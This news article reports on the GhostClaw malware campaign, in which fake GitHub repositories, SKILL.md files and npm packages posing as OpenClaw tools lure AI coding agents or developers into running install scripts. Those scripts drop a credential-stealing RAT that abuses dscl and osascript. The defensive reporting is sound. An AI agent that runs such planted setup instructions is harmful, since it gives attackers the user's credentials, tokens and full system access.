Threat actors are exploiting the rapid adoption of AI agents by designing malware that targets the agent itself. A new malware campaign, known as GhostClaw or GhostLoader, targets AI-assisted workflows and GitHub repositories to deliver credential-stealing payloads.
First discovered by JFrog Security Research and later analyzed by Jamf Threat Labs, GhostClaw represents a new vector in software supply chain attacks. Instead of exclusively relying on human developers to download malicious packages, the operators build traps for AI agents like OpenClaw to trigger autonomously. Once executed, the malware establishes a persistent Remote Access Trojan (RAT), harvesting system credentials, browser data, developer tokens, and cryptocurrency wallets.
The campaign preys on the high-level system permissions developers grant to local AI agents. GhostClaw shows how the bot is becoming the primary attack surface and should be a wake-up call for development teams relying on these frameworks to automate coding tasks.
The mechanics of GhostClaw
To understand how GhostClaw operates, you first need to look at how developers deploy new AI tools. OpenClaw is an open-source AI agent that acts as an autonomous, always-on coding assistant. Because it requires significant compute power to run local models continuously, its popularity has sparked a global surge in Mac Mini sales. Developers use Apple’s unified memory architecture to host these resource-heavy local AI servers.
GhostClaw operators designed their campaign to target this specific environment. The malware is heavily optimized for macOS, using native AppleScript and local directories to blend into the background.
The attack begins with social engineering. Attackers stage GitHub repositories that impersonate legitimate developer utilities, trading bots, or AI plugins. To avoid immediate detection, they leave these repositories benign for an incubation period of five to seven days. During this time, they gather stars and build follower counts to project credibility. After establishing trust, they swap in the malicious payload.
For developers using AI frameworks, the trap is set within a SKILL.md file. AI agents use skills to interact with the outside world, such as reading local files, executing shell commands, or managing emails. The SKILL.md format defines these external capabilities for the agent.
In the GhostClaw repositories, the SKILL.md file contains no malicious code. It defines benign metadata, dependencies, and commands. However, when an AI agent or a human developer follows the repository’s setup instructions (usually by running an install.sh script or installing dependencies via a package manager) they trigger a multi-stage infection.
JFrog researchers observed this behavior in malicious npm packages masquerading as OpenClaw installers. The package configuration appears normal, and the exposed source code contains harmless decoy utilities. The actual malware hides in installation scripts that run automatically. Using a postinstall hook (a feature in Node Package Manager (npm) that allows developers to run scripts immediately after a package finishes downloading) the script silently reinstalls the package globally and places a malicious binary on the system path.
From there, an obfuscated first-stage dropper takes over. It checks the host architecture, verifies the macOS version, and ensures Node.js is installed. If Node.js is missing, the script downloads it using the curl command with a -k flag. This flag tells the system to bypass Transport Layer Security (TLS) verification, allowing the download over an unverified or insecure connection.
While bypassing TLS might seem like an advanced evasion tactic, it points to a lack of sophisticated infrastructure. Setting up proper TLS certificates requires time and resources.
“Honestly, in most cases this comes down to operational laziness on the attacker’s side rather than any deliberate evasion strategy,” Jaron Bradley, Director at Jamf Threat Labs, told TechTalks. “Setting up proper TLS verification requires a level of infrastructure investment that many threat actors simply don’t bother with — especially when curl -k gets the job done just as well for their purposes.”
To maintain the illusion of a benign package, the malware actively works to keep its victim unsuspecting. The dropper executes a branded, terminal-based installation experience complete with fake progress bars. This manufactured output gives the impression that the OpenClaw agent or the promised developer tool is successfully installing on the host. By simulating a standard, time-consuming dependency installation, the script lulls the developer (or the AI agent monitoring the command-line logs) into a false sense of security right before it launches its credential-stealing prompts.
Defending the AI workflow
GhostClaw’s execution phase highlights why traditional security tools struggle to detect modern malware. The operators use a technique known as “Living off the Land” (LotL). Instead of dropping custom executable files that antivirus software can easily flag, LotL attacks use legitimate, pre-installed operating system tools to carry out malicious actions.
On UNIX-based platforms like macOS, administrators rely on thousands of native binaries for standard scripting and management. GhostClaw exploits two specific tools: dscl and osascript.
The dscl (Directory Service command line utility) tool natively creates, reads, and manages directory data. GhostClaw abuses it to silently validate system passwords behind the scenes. The malware also uses osascript, a tool for executing AppleScript, to generate native-looking prompts that trick users into handing over their credentials.
Because system administrators and power users run heavy, script-based workflows using these exact binaries, the malicious activity looks nearly identical to legitimate work. This overlap makes it difficult for Endpoint Detection and Response (EDR) tools to flag the behavior without generating excessive false positives.
To detect this activity, security engineers must analyze the full execution chain.
“When you see [dscl] being invoked in a context that doesn’t align with normal admin workflows, that’s a reliable signal worth investigating,” Bradley said. “Security engineers should be looking at the full execution chain: what spawned the process, what user context it ran under, and whether it’s showing up alongside other suspicious behaviors like unusual osascript prompts or outbound connections shortly after.”
For individual developers, defense requires a shift in daily habits. Attackers actively exploit the “set it and forget it” mentality inherent in package management. Developers rarely re-examine an open-source package after the initial installation. Preventing an infection requires vetting repositories before running their setup scripts. This means checking the commit history for sudden anomalies, reviewing the code in setup scripts, and remaining skeptical of projects that accumulate stars rapidly without corresponding development activity.
Developers operating outside the Apple ecosystem must also remain vigilant. While the current GhostClaw campaign is heavily optimized for macOS directories, the malware contains logic to perform automated actions if it discovers it is running on a Windows system. The vectors themselves (GitHub, npm, and AI agents) are entirely platform-agnostic.
“The malware was also equipped to perform automated actions if it discovered it was running on a Windows system,” Bradley said.
The evolving attack surface of AI agents
If you enjoyed this article, please consider supporting TechTalks with a paid subscription (and gain access to subscriber-only posts)
The GhostClaw campaign demonstrates a fundamental vulnerability in the current trajectory of AI development. As developers transition from reactive coding copilots to autonomous agents, the security paradigm is fracturing.
AI agents execute actions on behalf of the user. To function effectively, they require deep system permissions, including shell access, file system control, and browser manipulation. When developers grant an agent these privileges, they implicitly trust that the agent will only execute safe commands.
GhostClaw flips this dynamic. By hiding malicious execution chains within the standard setup workflows that agents follow, the malware bypasses the human entirely. Tricking the agent achieves the exact same result as tricking the developer.
“This shift is already underway,” notes Bradley. “Autonomous coding agents have shown enormous promise, and that promise has attracted a wave of developers eager to adopt them — often before the security implications have been fully thought through. When adoption outpaces security, attackers notice.”
This problem is compounded by widespread misconfigurations. Early adopters are eager to deploy autonomous agents but frequently overlook the security implications. Security researchers have already identified thousands of OpenClaw instances accidentally exposed to the open internet, running with default settings that listen for external connections without authentication.
When developers grant an AI agent root access to their machine, any malicious instruction the agent ingests becomes a system-level threat. Autonomous coding agents hold significant promise for productivity, but until the industry implements strict sandboxing and permission controls for AI workflows, the bot will remain a highly lucrative attack surface for threat actors.
“As long as that gap exists, we’ll absolutely see more of this,” Bradley said. “Tricking the agent is tricking the human — the bot becomes the attack surface precisely because developers trust its output implicitly.”

